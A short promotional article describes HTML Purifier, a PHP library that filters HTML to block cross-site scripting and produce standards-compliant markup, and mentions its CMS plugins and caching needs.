14 DAY TRIAL // The security of web applications is referring both to client or server side programs. The source code vulnerabilities from the web application security point of view could be detected and used in attacks over your web pages or programs running on server side.
For example, in case of database driven applications a simple web form could allow code injection (in the absence of a good code security) into a database that will permit the attacker to destroy your data or website content. Regarding the HTML code and client side scripts, the attacks may appear based on cross site scripting, a method also known as XSS. In case of HTML code, the insecure lines or definitions could be corrected using certain filters.
HTML Purifier is a library made in PHP, having the role to filter HTML code. It will remove the XSS vulnerabilities and, in the same time, will make the code standards compliant, as specified by W3C (The World Wide Web Consortium). HTML purifier blocks the XSS attacks by using an audited whitelist. The standards compliant outputted HTML code can be obtained from many types of documents, like XHTML 1.0 , HTML 4.01 and XHTML 1.1.
In order to minimize XSS attacks and have an optimized HTML code, it is recommended to use HTML Purifier in combination with a content management system or a WYSIWYG (What You See Is What You Get) HTML editor. In this sense, HTML Purifier library offers plugins for a series of content management system like Phorum, MODx, Drupal, WordPress and CodeIgniter.
The execution times in case of HTML code filtering with HTML Purifier could have high values in certain conditions. Due to this fact it is suitable to use caching mechanisms (codes). In conclusion, this HTML code filtering library is highly customizable and has a dual action: protection against XSS attacks and syntax optimization. On the author website there is an extensive documentation as well as tips for library usage in certain practical cases.